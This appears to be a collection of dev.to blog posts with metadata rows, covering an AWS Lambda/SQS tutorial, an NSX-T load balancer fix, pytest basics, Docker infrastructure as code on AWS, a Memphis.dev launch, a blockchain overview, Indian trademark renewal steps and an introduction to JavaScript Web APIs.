items = response['Items']
for acc in items:
#sending individual accounts to the queue
response_q = sqs.send_message(
QueueUrl=queue_url,
DelaySeconds=10,
MessageAttributes={
'AccountID': {
'DataType': 'String',
'StringValue': acc['AccountID']['S']
}
},
MessageBody=(
'Inactive account id info '
)
)
print(response_q['MessageId'])
return {
'statusCode': 200,
'body': json.dumps('All Inactive Account Ids Added into SQS queue')
}
```
1. use environment variables for "SQS URL" and "DYNAMO DB NAME". This can be set up in lambda funciton -> configuration -> environment variables (use environment variables in all the lambda functions for sensitive information like url, arn values etc)
2. "Status" is a reserved key word for dynamodb, thus we are using FilterExpression and ExpressionAttributeNames to make :s_val as a placeholder for the status attribute
3. For the Lambda to execute we need to give appropriate permissions to our lambda role. Go to Functions > dumpIntoSQS > Configuration > Permissions > Execution Role which will redirect you to IAM policies of our lambda role.
- Click on Add Permissions > Attach Policy. Attach the following policies to our role.
- _AmazonDynamoDBFullAccess_
- _AmazonSQSFullAccess_
**2) receiveID**
This function performs three tasks:
- Receive an account id of an inactive account from the queue.
- to change the status of accounts from inactive to active in the table once the accounts are assigned from the queue.
- Delete the assigned id from queue
```
import json
import boto3
import os
sqs = boto3.client('sqs')
dynamodb = boto3.resource('dynamodb')
queue_url = os.environ['SQS_URL']
dynamoDB_name = os.environ['DYNAMO_DB_NAME']
def lambda_handler(event, context):
# Receive message from SQS queue
response_sqs = sqs.receive_message(
QueueUrl=queue_url,
AttributeNames=[
'SentTimestamp'
],
MaxNumberOfMessages=1,
MessageAttributeNames=[
'All'
],
VisibilityTimeout=0,
WaitTimeSeconds=0
)
message = response_sqs['Messages'][0]
receipt_handle = message['ReceiptHandle']
accountIdForUpdate = message['MessageAttributes']['AccountID']['StringValue']
#update dynamoDB before deletion from queue
table = dynamodb.Table(dynamoDB_name)
response_db = table.update_item(
Key={
'AccountID': accountIdForUpdate,
},
ExpressionAttributeNames={
"#st" : "Status"
},
UpdateExpression='SET #st = :s_val',
ExpressionAttributeValues={
':s_val': 'Active'
}
)
# Delete element from queue
sqs.delete_message(
QueueUrl=queue_url,
ReceiptHandle=receipt_handle
)
print('Received message & deleted: %s \n' % message )
print('Item updated: ',response_db)
return {
'statusCode': 200,
'body': accountIdForUpdate
}
```
For the Lambda to execute we need to give appropriate permissions to our lambda role. Go to Functions > dumpIntoSQS > Configuration > Permissions > Execution Role which will redirect you to IAM policies of our lambda role.
- Click on Add Permissions > Attach Policy. Attach the following policies to our role.
- _AmazonDynamoDBFullAccess_
- _AmazonSQSFullAccess_
**3) pushIntoSQS_uponChange**
This lambda will send a message to SQS, i.e. pushes into the queue, containing the ID of the account that has been changed from Active to Inactive after completion of its usage.
```
import json
import boto3
import os
sqs = boto3.client('sqs')
queue_url = os.environ['SQS_URL']
def lambda_handler(event, context):
accountID = event['Records'][0]['dynamodb']['NewImage']['AccountID']['S']
if event['Records'][0]['dynamodb']['NewImage']['Status']['S'] == 'Inactive':
#send the changed id to queue
response = sqs.send_message(
QueueUrl=queue_url,
DelaySeconds=10,
MessageAttributes={
'AccountID': {
'DataType': 'String',
'StringValue': accountID
}
},
MessageBody=(
'Inactive account id info '
)
)
print('Status changed to ', event['Records'][0]['dynamodb']['NewImage']['Status']['S'])
return {
'statusCode': 200,
'body': json.dumps('Status is changed in DynamoDB')
}
```
For the Lambda to execute we need to give appropriate permissions to our lambda role. Go to Functions > dumpIntoSQS > Configuration > Permissions > Execution Role which will redirect you to IAM policies of our lambda role.
- Click on Add Permissions > Attach Policy. Attach the following policies to our role.
- _AWSLambdaSQSQueueExecutionRole_
- _AmazonSQSFullAccess_
To trigger the lambda we need to setup a DynamoDB Stream.
To Set up the DynamoDB Stream go to the Table -> Exports and Streams


Once the DynamoDB Stream is turned on. We need to add trigger, so that this stream can trigger the execution of a lambda function


Now we have created the DB Stream and have set it as the trigger for our lambda.
After setting up the lambda, test it by changing one of the values of active attribute to inactive or by creating a new account ID with inactive status. Then check your SQS Queue for messages and you can see a message received which looks this the following:

## **Conclusion:**
In this blog, we explored how to build a serverless program using AWS Lambda, DynamoDB, and SQS. By implementing three Lambda functions, we automated the processing of managing active and inactive accounts. We utilized DynamoDB Streams to trigger a Lambda function whenever an account's status changed and added the account ID to an SQS queue. Finally, we created a Lambda function to consume the account IDs from the queue and perform necessary actions.
**Documentation and references: **
[Dynamo DB](https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/dynamodb.html)
[SQS](https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/sqs.html)
[Code(github)](https://github.com/VedVaghela/serverlessCode)
_Note:_
The policies attached to the lambda roles are of full access for the purpose of smooth operations in the example. However, One should follow the principle of least privilege and only give necessary policies to the role.
This blog is for knowledge purposes only. Use the resources wisely and responsibly.
| vedvaghela |
1,521,168 | NSX-T 3.2 and NSX ALB (Avi) Deployment Error - "Controller is not reachable. {0}" | Note: This feature has been deprecated by VMware NSX-T 3.2 has been released, and has a ton of... | 0 | 2023-07-04T15:30:45 | https://blog.engyak.co/2021/12/nsx-t-32-and-nsx-alb-avi-deployment/ | ---
title: NSX-T 3.2 and NSX ALB (Avi) Deployment Error - "Controller is not reachable. {0}"
published: true
date: 2021-12-23 06:00:00 UTC
tags:
canonical_url: https://blog.engyak.co/2021/12/nsx-t-32-and-nsx-alb-avi-deployment/
---
**Note: This feature has been [deprecated by VMware](https://kb.vmware.com/s/article/87899)**
NSX-T 3.2 has been released, and has a ton of spiffy features. The NSX ALB integration is particularly neat, but while repeatedly (repeatably) breaking the integration to learn more about it, I ran into this error:
[

](error.png)
When deploying NSX ALB appliances from the NSX Manager, it's very important to keep the NSX ALB Controller appliances **where NSX Manager can see them**. In addition, the appliances **must exist on the same Layer 2 Segment**.
Detailed requirements for running the two together are here: [https://docs.vmware.com/en/VMware-NSX-T-Data-Center/3.2/installation/GUID-3D1F107D-15C0-423B-8E79-68498B757779.html](https://docs.vmware.com/en/VMware-NSX-T-Data-Center/3.2/installation/GUID-3D1F107D-15C0-423B-8E79-68498B757779.html)
This post is not about the integration, however.
The following error:
```
1NSX Advanced Load Balancer Controller is not reachable {0}
```
Indicates that NSX-T has orphaned appliances. NSX-T has API invocations for cleaning this up, but not GUI integrations. This is similar to other objects, and is because programmatic checking should be used to allow this work to be reliable.
To fix this, we must perform the following steps:
- Get the list of NSX ALB appliances, if there isn't any, exit
- Iterate through the list of appliances, prompting the user to delete
- After deleting, check to make sure that it was deleted
The first step for any API invocations should be [consulting the documentation](https://developer.vmware.com/apis/1198/nsx-t). The NSX ALB Appliance management section is **3.7.1.4.** After researching the procedure, I found the following endpoints:
- [/policy/api/v1/alb/controller-nodes/deployments](https://vdc-download.vmware.com/vmwb-repository/dcr-public/ce4128ae-8334-4f91-871b-ecce254cf69e/488f1280-204c-441d-8520-8279ac33d54b/api_includes/method_ListALBControllerNodeVMDeploymentRequests.html)
- [/policy/api/v1/alb/controller-nodes/deployments/<node-id>?action=delete</node-id>](https://vdc-download.vmware.com/vmwb-repository/dcr-public/ce4128ae-8334-4f91-871b-ecce254cf69e/488f1280-204c-441d-8520-8279ac33d54b/api_includes/method_DeleteAutoDeployedALBControllerNodeVM.html)
Performing this procedure with programmatic interfaces is a good example of when to use APIs - the task is well defined, the results are easy to test, and work to prevent user mistakes is rewarding.
TL;DR - I wrote the code here, integrating it with the REST client: [https://github.com/ngschmidt/python-restify/blob/main/nsx-t/nsxalb\_deployment\_cleanup.py](https://github.com/ngschmidt/python-restify/blob/main/nsx-t/nsxalb_deployment_cleanup.py) | ngschmidt | |
1,521,497 | Mastering Pytest: An Introduction to Python Testing | Introduction Welcome to the first installment of our blog series on pytest—an incredible testing... | 23,569 | 2023-06-30T02:44:41 | https://dev.to/bshadmehr/mastering-pytest-an-introduction-to-python-testing-2gpd | Introduction
Welcome to the first installment of our blog series on pytest—an incredible testing framework for Python developers. Testing is a crucial aspect of software development, and pytest offers a simple yet powerful approach to writing and executing tests. In this blog post, we'll lay the foundation for mastering pytest by covering the basics and exploring its key features. So, let's dive in and unlock the potential of pytest for effective and efficient testing in Python.
**Table of Contents**
1. Understanding Testing and Pytest
2. Installing Pytest
3. Writing Your First Pytest Test Case
4. Organizing Test Files and Test Discovery
5. Exploring Pytest's Powerful Features
## 1. Understanding Testing and Pytest
Before we jump into pytest, let's start by understanding the importance of testing in software development and how pytest fits into the testing landscape.
### Why Testing Matters
Testing is an integral part of the software development process. It helps us ensure that our code works as expected, identifies and prevents bugs, and provides confidence in the reliability and correctness of our software. By writing tests, we can verify that our code meets the desired functionality, validates edge cases, and detects potential issues early on. Testing also plays a crucial role in maintaining and evolving codebases, allowing developers to refactor with confidence and avoid introducing regressions.
### What is Pytest?
Pytest is a testing framework for Python that simplifies the process of writing tests. It provides a clean and expressive syntax, powerful features, and a wealth of plugins that enhance its capabilities. Pytest is widely adopted in the Python community due to its simplicity and effectiveness, making it an excellent choice for both small and large projects.
Pytest offers numerous advantages over other testing frameworks. It embraces simplicity, allowing you to write concise and readable tests using plain Python asserts. It also provides powerful features such as fixtures, which enable you to create reusable test setup and teardown code. Pytest's rich plugin ecosystem offers a wide range of additional functionalities, such as code coverage, test parallelization, and test parameterization.
### Getting Started with Pytest
To start using pytest, you need to install it in your Python environment. Open your terminal or command prompt and run the following command:
```
pip install pytest
```
Once pytest is installed, you're ready to write your first test case and experience the power of pytest in action.
## Conclusion
In this first blog post of our pytest series, we've introduced the importance of testing in software development and explored the fundamentals of pytest. We've learned that testing helps ensure the correctness and reliability of our code, and pytest simplifies the process of writing tests with its clean syntax and powerful features.
In the next blog post, we'll dive deeper into pytest by covering the installation process, writing your first pytest test case, and understanding how to organize your test files and discover tests automatically. Stay tuned as we unlock more of pytest's capabilities and empower you to become a testing maestro with pytest!
Happy testing! | bshadmehr | |
1,522,361 | Infrastructure as Code: Managing Docker Containers using AWS DevOps Tools | Introduction: In the world of modern software development, managing infrastructure has... | 0 | 2023-06-30T18:17:56 | https://dev.to/ukemzyskywalker/infrastructure-as-code-managing-docker-containers-using-aws-devops-tools-1oc4 | devops, docker, aws, containers | ### Introduction:
In the world of modern software development, managing infrastructure has become a critical aspect of the DevOps lifecycle. Infrastructure as Code (IaC) has emerged as a best practice that allows developers to define and manage their infrastructure using code.
This blog post will explore how AWS DevOps tools can be leveraged to manage Docker containers using Infrastructure as Code principles. We'll dive into the key concepts and demonstrate practical examples using code snippets.
### Understanding Infrastructure as Code:
Infrastructure as Code involves treating infrastructure components, such as servers, networks, and services, as programmable resources. This approach allows for version control, reproducibility, and automation, which are crucial for efficient infrastructure management. By using IaC, developers can define and provision their infrastructure using declarative code, enabling consistent deployments and eliminating manual configuration drift.
### Managing Docker Containers with AWS DevOps Tools:
AWS provides a set of powerful DevOps tools that seamlessly integrate with Docker containers, enabling effective management and deployment. Let's explore some key AWS services and how they can be utilized for managing Docker containers as code.
### 1. AWS CloudFormation:
AWS CloudFormation is a powerful service that allows you to define and provision your AWS infrastructure using declarative templates. With CloudFormation, you can define a stack that includes various AWS resources, such as EC2 instances, VPCs, and security groups.
To manage Docker containers, you can use CloudFormation to create and configure the necessary resources, such as Amazon Elastic Container Service (ECS) clusters, task definitions, and services.
Example CloudFormation template snippet for defining an ECS service:
```
Resources:
MyEcsService:
Type: AWS::ECS::Service
Properties:
Cluster: !Ref MyEcsCluster
TaskDefinition: !Ref MyEcsTaskDefinition
DesiredCount: 2
LaunchType: FARGATE
NetworkConfiguration:
AwsvpcConfiguration:
Subnets:
- !Ref MySubnet1
- !Ref MySubnet2
SecurityGroups:
- !Ref MySecurityGroup
```
### 2. AWS CodePipeline:
AWS CodePipeline is a fully managed continuous integration and continuous delivery (CI/CD) service. It enables you to automate your software release workflows, including the deployment of Docker containers. CodePipeline integrates with various AWS services, including AWS CodeCommit, AWS CodeBuild, and AWS CodeDeploy. You can configure a pipeline that automatically builds and deploys your Docker images to Amazon Elastic Container Registry (ECR) or ECS.
Example CodePipeline configuration for building and deploying Docker containers:
```
Stages:
- Name: Source
Actions:
- Name: SourceAction
ActionTypeId:
Category: Source
Owner: AWS
Provider: CodeCommit
Version: "1"
Configuration:
RepositoryName: MyCodeRepo
BranchName: main
OutputArtifacts:
- Name: source
- Name: Build
Actions:
- Name: BuildAction
ActionTypeId:
Category: Build
Owner: AWS
Provider: CodeBuild
Version: "1"
Configuration:
ProjectName: MyCodeBuildProject
InputArtifacts:
- Name: source
OutputArtifacts:
- Name: build
- Name: Deploy
Actions:
- Name: DeployAction
ActionTypeId:
Category: Deploy
Owner: AWS
Provider: ECS
Version: "1"
Configuration:
ClusterName: MyEcsCluster
ServiceName: MyEcsService
FileName: imagedefinitions.json
Image1ArtifactName: build
```
### 3. AWS Elastic Beanstalk:
AWS Elastic Beanstalk is a fully managed platform that simplifies deploying and scaling applications. With Elastic Beanstalk, you can easily deploy your Docker containers without worrying about the underlying infrastructure. Elastic Beanstalk abstracts away the complexities of infrastructure management and provides a simple deployment model.
Example Elastic Beanstalk configuration for Docker container deployment:
```
Resources:
MyElasticBeanstalkEnvironment:
Type: AWS::ElasticBeanstalk::Environment
Properties:
ApplicationName: MyApplication
EnvironmentName: MyEnvironment
SolutionStackName: "64bit Amazon Linux 2 v3.4.3 running Docker"
OptionSettings:
- Namespace: aws:elasticbeanstalk:environment
OptionName: EnvironmentType
Value: SingleInstance
- Namespace: aws:elasticbeanstalk:application:environment
OptionName: MyEnvironmentVariable
Value: MyValue
```
By leveraging AWS DevOps tools such as CloudFormation, CodePipeline, and Elastic Beanstalk, you can effectively manage Docker containers using Infrastructure as Code principles.
This approach provides numerous benefits, including version control, repeatability, and automation. By treating infrastructure as code, you can achieve consistency, scalability, and efficiency in managing your Dockerized applications on the AWS platform. | ukemzyskywalker |
1,522,374 | Answer: Text search across multiple MS Word documents | answer re: Text search across multiple MS... | 0 | 2023-06-30T18:28:59 | https://dev.to/oscarsun72/answer-text-search-across-multiple-ms-word-documents-3m7l | {% stackoverflow 76591343 %} | oscarsun72 | |
1,522,801 | Chơi tài xỉu trực tuyến tại Sunwin – Đánh bài, giải trí, kiếm tiền thả ga | https://sunwinnews.com/ là một trang web cung cấp các dịch vụ casino trực tuyến✔️ bao gồm cả chơi tài... | 0 | 2023-07-01T07:27:19 | https://dev.to/sunwinnewscom/choi-tai-xiu-truc-tuyen-tai-sunwin-danh-bai-giai-tri-kiem-tien-tha-ga-528i | https://sunwinnews.com/ là một trang web cung cấp các dịch vụ casino trực tuyến✔️ bao gồm cả chơi tài xỉu✔️ Với Sunwin✔️ bạn sẽ được trải nghiệm những trò chơi đỉnh cao cùng các tính năng công nghệ tiên tiến nhất✔️✔️✔️
https://peatix.com/user/18007672
https://matters.town/@sunwinnewscom
https://matters.town/@sunwinnewscom
https://sunwinnewscom.amebaownd.com/
https://github.com/sunwinnewscom
https://app.bountysource.com/people/118493-sunwinnews-com | sunwinnewscom | |
1,523,020 | Exploring Web3 and the Sephron Blockchain: Building a Decentralized Future | Introduction: Web3 and blockchain technology have emerged as revolutionary forces that are... | 0 | 2023-07-01T12:33:24 | https://dev.to/deven16082003/exploring-web3-and-the-sephron-blockchain-building-a-decentralized-future-3fa0 | Introduction:
Web3 and blockchain technology have emerged as revolutionary forces that are transforming various industries and redefining how we interact, transact, and collaborate online. One intriguing project in the realm of Web3 is Sephron, a blockchain platform that aims to create a decentralized ecosystem. In this blog, we will delve into the concept of Web3 and explore the features and potential of the Sephron blockchain.
Understanding Web3:
Web3 refers to the next generation of the internet, enabling decentralized and peer-to-peer interactions without relying on centralized intermediaries. It envisions a more open, transparent, and user-centric online environment, empowering individuals to have control over their data, digital assets, and online identities.
Sephron Blockchain:
The Sephron blockchain is a prominent player in the Web3 landscape. It is designed to provide a secure, scalable, and decentralized infrastructure for building decentralized applications (DApps) and facilitating smart contract functionality. Here are some key aspects of the Sephron blockchain:
Decentralization: The Sephron blockchain operates on a distributed network of nodes, ensuring that no central authority has control over the system. This decentralized architecture enhances transparency, security, and resilience.
Consensus Mechanism: Sephron employs a consensus mechanism called Proof-of-Stake (PoS), where validators are chosen based on their stake in the network. PoS ensures energy efficiency and enables faster transaction processing compared to traditional Proof-of-Work (PoW) systems.
Smart Contracts: Sephron supports the execution of smart contracts, which are self-executing agreements with predefined rules. These contracts automatically execute transactions when specific conditions are met, enabling trustless and tamper-proof interactions.
Interoperability: The Sephron blockchain aims to foster interoperability by integrating with other blockchains and protocols. This cross-chain compatibility allows for seamless communication and collaboration between different blockchain networks.
Privacy and Security: Sephron emphasizes privacy and security by utilizing cryptographic techniques to protect user data and transactions. It enables users to retain control over their private keys and ensures that sensitive information remains secure.
Potential Applications:
The Sephron blockchain has the potential to revolutionize various industries and use cases. Here are a few examples:
Finance and DeFi: Sephron can facilitate decentralized finance (DeFi) applications such as lending, borrowing, and decentralized exchanges, offering transparent and secure financial services without intermediaries.
Supply Chain Management: Sephron's decentralized nature can enhance supply chain transparency, tracking the movement of goods and verifying authenticity, ultimately reducing fraud and increasing trust.
Identity Management: Sephron's blockchain can enable self-sovereign identity solutions, where individuals have control over their personal information and can selectively share it with trusted entities.
Gaming and NFTs: Sephron's blockchain can power decentralized gaming platforms and the creation, trading, and ownership of non-fungible tokens (NFTs), providing unique digital assets and in-game economies.
Conclusion:
Web3 and blockchain technology, with projects like Sephron, hold immense potential to reshape the digital landscape by fostering decentralization, trust, and innovation. The Sephron blockchain's focus on security, scalability, and interoperability makes it an exciting platform for building decentralized applications across various sectors. As Web3 continues to evolve, we can expect groundbreaking advancements and transformative applications that empower individuals and revolutionize industries.
Disclaimer: The information provided in this blog is for educational purposes only and should not be considered as financial or investment advice. It is essential to conduct thorough research and seek professional guidance before making any investment decisions. | deven16082003 | |
1,524,579 | Process of Trademark Renewal in India | Step 1: Application Filing Submit a renewal application in Form TM-R to the Trademark... | 0 | 2023-07-03T10:19:14 | https://dev.to/gaurikaverma89/process-of-trademark-renewal-in-india-1lm3 | trademarkrenewalprocess, trademarkrenewal, trademarkregistration, trademarkregistrationinindia | Step 1: Application Filing
- Submit a renewal application in Form TM-R to the Trademark Registry.
- Include details such as the trademark registration number, current status, and applicant's contact information.
Step 2: Verification and Examination
- The Registry verifies the application and examines the trademark for conflicts and compliance with renewal requirements.
- If objections arise, the Registry seeks clarifications from the applicant, who must respond within the given timeframe.
Step 3: Publication in Trademark Journal
- After resolving any objections, the details of the trademark renewal are published in the Trademark Journal for a 4-month period.
- This allows for third-party opposition, which must be addressed by the applicant within the specified timeframe.
Step 4: Issuance of Renewal Certificate
- Upon successful completion of the publication period and resolution of any opposition, the Registry issues the [Trademark Renewal](https://www.setindiabiz.com/learning/process-of-trademark-renewal-in-india) Certificate.
- This certificate confirms the renewed validity of your trademark for the next 10 years.
**By following these steps and providing the necessary documents, you can ensure the smooth and effective renewal of your trademark in India.
**
For more details : https://www.setindiabiz.com/trademark-registration | gaurikaverma89 |
1,524,752 | Introducing Memphis.dev Cloud: Empowering Developers with the Next Generation of Streaming | Event processing innovator Memphis.dev today introduced Memphis Cloud to enable a full serverless... | 0 | 2023-07-03T13:30:37 | https://memphis.dev/blog/introducing-memphis-dev-cloud-empowering-developers-with-the-next-generation-of-streaming/ |
Event processing innovator Memphis.dev today introduced Memphis Cloud to enable a full serverless experience for massive scale event streaming and processing, and announced it had secured $5.58 million in seed funding co-led by Angular Ventures and boldstart ventures, with participation from JFrog co-founder and CTO Fred Simon, Snyk co-founder Guy Podjarny, CircleCI CEO Jim Rose, Console.dev co-founder David Mytton, and Priceline CTO Martin Brodbeck.
## Introducing Memphis.dev Cloud
Memphis.dev, the next-generation event streaming platform, is ready to make waves in the world and disrupt data streaming with its highly anticipated cloud service launch.
With a firm commitment to providing developers and data engineers with a powerful and unified streaming engine, Memphis.dev aims to revolutionize the way software is utilizing a message broker. In this blog post, we delve into the key features and benefits of Memphis.dev’s cloud service, highlighting how it empowers organizations and developers to unleash the full potential of their data.
---
## What to expect?
**1. The Serverless Experience**
Memphis’ platform was intentionally designed to be deployed in minutes, on any Kubernetes, on any cloud, both on-prem, public cloud, or even in air-gapped environments.
In advance of the rising multi-cloud architecture, Memphis enables streamlining development between the local dev station all the way to the production, both on-prem and through various clouds, and to reduce TCO and overall complexity – the serverless cloud will enable an even faster onboarding and time-to-value.
**2. Enable “Day 2” operations**
Message brokers need to evolve to handle the vast amount and complexity of events that occur, and they need to incorporate three critical elements: reliable; ease to manage and scale; and, offer what we call the “Day 2” operations on top to help build queue-based, stream-driven applications in minutes.
To support both the small and the massive scale and workloads Memphis is built for, some key features were only enabled to be delivered via the cloud.
Key features in Memphis Cloud include:
1. Augmenting Kafka clusters – providing the missing piece in modern stream processing with the ability to augment Kafka clusters;
2. Schemaverse – Enabling built-in schema management, enforcement, and transformation to ensure data quality as our data gets complicated and branched;
3. Multi-tenancy – Offering the perfect solution for users of SaaS platforms who want to isolate traffic between their customers;
4. True multi-cloud – creating primary instances on GCP, and a replica on AWS.
**3. A Developer-Centric Approach (and obsession**
Memphis.dev’s cloud service launch is driven by a developer-centric philosophy, recognizing that developers are the driving force behind technological innovation. With a deep understanding of developers’ and data engineers’ needs, especially in the current era of much more complicated pipelines with much fewer hands, Memphis.dev has created a comprehensive suite of out-of-the-box tools and features tailored specifically to enhance productivity, streamline workflows, and facilitate collaboration. By prioritizing the developer experience, Memphis.dev aims to empower developers to focus on what they do best: writing exceptional code, and extracting value out of their data!
**4. No code changes. Open-source to Cloud.**
Fully aligned development experience between the open-source and the cloud. No code changes are needed, nor an application config modification.
The cloud does reveal an additional parameter to add and is not mandatory, which is an account id.
**5. Enhanced Security and Compliance**:
Memphis.dev prioritizes the security and compliance of its cloud service, recognizing the critical importance of protecting sensitive data. With robust security measures, including data encryption, role-based identity and access management, integration with 3rd party identity managers, and regular security audits, Memphis.dev ensures that developers’ applications and data are safeguarded. By adhering to industry-standard compliance frameworks, Memphis.dev helps developers meet regulatory requirements and build applications with confidence.
**6. Support and Success**
The core support and customer service ethos of Memphis.dev is customer success and enablement. A successful customer is a happy customer, and we are working hard to support our customers not just with Memphis, but with their bigger picture and data journey. Three global customer support teams, spread across three different timezones alongside highly experienced data engineers and data architects that are positioned as Customer Success Engineers and willing to dive into the internals of our customers and help them achieve their goals.
---
“Cluster setup, fault tolerance, high availability, data replication, performance tuning, multitenancy, security, monitoring, and troubleshooting all are headaches everyone who has deployed traditional message broker platforms is familiar with,” said Torsten Volk, senior analyst, EMA. “Memphis however is incredibly simple so that I had my first Python app sending and receiving messages in less than 15 minutes.”
“The world is asynchronous and built out of events. Message brokers are the engine behind their flow in the modern software architecture, and when we looked at the bigger picture and the role message brokers play, we immediately understood that the modern message broker should be much more intelligent and by far with much less friction,” said Yaniv Ben Hemo, co-founder and CEO, Memphis. “With that idea, we built Memphis.dev which takes five minutes on average for a user to get to production and start building queue-based applications and distributed streaming pipelines.”
---
[Join 4500+ others and sign up for our data engineering newsletter.](https://share.hsforms.com/1lBALaPyfSRS3FLLLy_Hsfgcqtej)
Originally published at Memphis.dev By Yaniv Ben Hemo, Co-Founder & CEO at [Memphis.dev](https://memphis.dev/blog/)
Follow Us to get the latest updates!
[Github](https://github.com/memphisdev/memphis) • [Docs](https://docs.memphis.dev/memphis/getting-started/readme) • [Discord](https://discord.com/invite/DfWFT7fzUu)
| atrifsik | |
1,525,531 | Lets build a simple interpreter from scratch in python, pt.11: Parser | Simple parser in Python... | 0 | 2023-07-04T06:17:43 | https://dev.to/smadev/lets-build-a-simple-interpreter-from-scratch-in-python-pt11-parser-1c0o | python, programming, interpreter | {% embed https://m.youtube.com/watch?v=ioaC-YmZZHE %} | smadev |
1,527,237 | JavaScript Web APIs Series: Introduction | When talking about technology in the context of software and especially web and internet... | 23,677 | 2023-07-07T18:37:28 | https://olodocoder.hashnode.dev/javascript-web-apis-series-introduction | javascript, webdev, api, programming | When talking about technology in the context of software and especially web and internet applications, it is safe to say that Application Programming Interfaces, commonly known as APIs, are one of the most essential tools that enable developers to build useful and functional applications because they allow things that would be otherwise impossible become possible.
In this part of the series, you will learn about JavaScript, the web, APIs, and how they help you build with much more functionality than you would have been able to. You will also explore what JavaScript Web APIs are and how they differ from the traditional APIs you're already familiar with.
> _Note: If you are already familiar with the basics of JavaScript, how the web works, and what APIs are, You might want to skip to the next part of the series to start exploring JavaScript Web APIs and what they are capable of._
So first, let's explore how the web works in the next section.
## Web
The World Wide Web has become an integral part of our daily lives, connecting people and information across the globe. Behind the scenes, the web operates on a complex system of technologies and protocols that enable the creation, delivery, and consumption of web content. In the context of software development, understanding how the web works is crucial for building efficient, scalable, and secure applications.
At the core of the web lies the client-server model, where clients, usually web browsers or mobile apps, request resources from servers. When a user enters a URL in their browser, it initiates an HTTP (Hypertext Transfer Protocol) request to the appropriate server. The server processes the request and sends back a response containing the requested data, typically in HTML, JSON, XML, or other file formats.
Next, let's see what JavaScript is in the next section.
## JavaScript
JavaScript is a versatile programming language created by Brendan Eich in 1995. It enables developers to add interactivity and dynamic behavior to web applications. It runs directly in the browser, allowing developers to manipulate web page elements, respond to user actions, and fetch data from servers asynchronously.
It facilitates the creation of interactive forms, animations, and complex user interfaces. With the advent of frameworks like React, Angular, Vue.js, and many others, JavaScript has evolved into a robust ecosystem that powers sophisticated web applications.
Over the years, JavaScript has grown beyond the scope of just web browsers with the advent of tools like NodeJS for server-side development, React Native for mobile apps, Electron for desktop apps, BrainJs for machine learning, CylonJS for IOT, and so much more.
These tools enable JavaScript developers to build different software applications without the need to learn other programming languages, thus making them more powerful and versatile in the tech ecosystem.
## Application Programming Interfaces (APIs)
Application Programming Interfaces (APIs) enable data exchange and functionality between different software systems. APIs define rules and protocols for how different software components interact and share resources. With architectural standards such as Representational State Transfer (REST) or GraphQL, APIs provide standardized methods for accessing and manipulating data over the web.
APIs are crucial for building distributed systems, enabling software developers to leverage external functionality and integrate their applications with third-party services.
Now that you know how the web works, what JavaScript is, and what APIs do, let's explore JavaScript Web APIs, how they work, and how they differ from regular APIs in the next section.
## JavaScript Web APIs
JavaScript Web APIs are a collection of functions and protocols that enable JavaScript to interact with web browsers and other web services.
As mentioned earlier, APIs define rules and protocols for how software applications interact; JavaScript Web APIs, on the other hand, define the standard for how certain things are done in the JavaScript ecosystem. You can think of them as enhancements to the capabilities of JavaScript.
### How JavaScript Web APIs Work
JavaScript Web APIs are a set of functions that give you access to certain parts and functionality of the browser, smartphone, or any other client that supports the API so that you can enhance the functionalities of your website or app without the need to learn another language or even installing another dependency into your application codebase.
While a lot of the JavaScript Web APIs are ready to use and supported by major web browsers and smartphones, some of them are still in "Experimental" mode; this means you need to specifically check if the platforms you're building for support it before using it, to avoid wasting development time.
## Types of JavaScript Web APIs

There are different types of JavaScript Web APIs, and they all help developers build different features and functionalities; in fact, there are over a hundred of them.
That said, you can use them alone or combine multiple to create something unique for your applications—more on how to do that in the following parts of the series.
Now that you understand that there are a lot of JavaScript Web APIs let's take a look at them briefly in different categories in the following sections.
### Audio and Video APIs
The Audio and Video category of JavaScript Web APIs provides functionality for handling multimedia content. This includes APIs for playing audio and video files, capturing audio and video from devices, and manipulating media streams.
These APIs can be used to create interactive media players, video conferencing applications, audio recording tools, and much more.
### Background and Synchronization APIs
The Background and Synchronization category includes APIs that allow JavaScript applications to perform tasks in the background and synchronize data across different devices or browser instances.
These APIs enable developers to build features such as background data synchronization, push notifications, periodic background tasks, and offline data caching.
### Device and Sensor APIs
This category of APIs provides access to various device-specific functionalities and sensor data. It includes APIs for accessing information about the user's device, such as battery status, network connectivity, geolocation, and orientation.
These APIs enable developers to create location-based services, augmented reality applications, device-specific optimizations, and more.
### Document Object Model (DOM) Manipulation APIs
DOM Manipulation APIs allow JavaScript to interact with the HTML document structure, its elements, and its styles and attributes.
These APIs enable developers to dynamically modify the content and appearance of web pages, handle user interactions, and create responsive and interactive web applications.
### File and Storage APIs
The File and Storage category provides APIs for working with files and data storage on the client side. It includes APIs for reading and writing files, accessing local file systems, managing client-side databases, and storing data using key-value pairs or structured storage.
These APIs are useful for building applications that require local data persistence, file management, or offline functionality.
### Input and Events APIs
The Input and Events category covers user input and event-handling APIs. These APIs allow developers to capture and respond to user interactions, such as mouse clicks, keyboard inputs, touch gestures, and other events.
They also include APIs for handling input from various devices, such as game controllers or stylus pens.
### Networking and Communication APIs
Networking and Communication APIs help facilitate communication between web applications and remote servers.
These APIs enable sending HTTP requests, fetching and manipulating data from remote sources, establishing WebSocket connections for real-time communication, and implementing server-side communication protocols such as WebRTC.
They are fundamental for building web applications that interact with backend services or provide real-time collaboration features.
### Performance and Optimization APIs
The Performance and Optimization category includes APIs that help developers optimize the performance of their web applications.
These APIs provide tools for measuring and analyzing performance metrics, optimizing rendering and layout, managing memory and resources, and improving overall application speed and responsiveness.
### Security and Privacy APIs
Security and Privacy APIs offer mechanisms to protect user data and enhance web application security.
They include APIs for handling user authentication and authorization, securing network communications using encryption and certificates, managing browser permissions, and preventing common security vulnerabilities like cross-site scripting (XSS) or cross-site request forgery (CSRF).
### User Interface and Presentation APIs
The User Interface and Presentation category encompasses APIs for creating and managing user interfaces, including graphical elements and visual effects.
These APIs allow developers to dynamically manipulate styles and layouts, animate page elements, create custom UI components, and implement responsive design patterns. They are vital for creating visually appealing and interactive web applications.
## Conclusion
And that's it! I hope this article achieved its aim of showing you that much more is possible with JavaScript beyond the regular stuff you already use it for. You also explore the different categories of JavaScript Web APIs and what they can help you build.
In the following parts of the series, we will explore all the JavaScript Web APIs under each category, what they can do, how to use them, and much more. Thanks again for reading, and don't forget to follow me here on Dev and [Twitter](twitter.com/olodocoder). See you in the next one! | olodocoder |
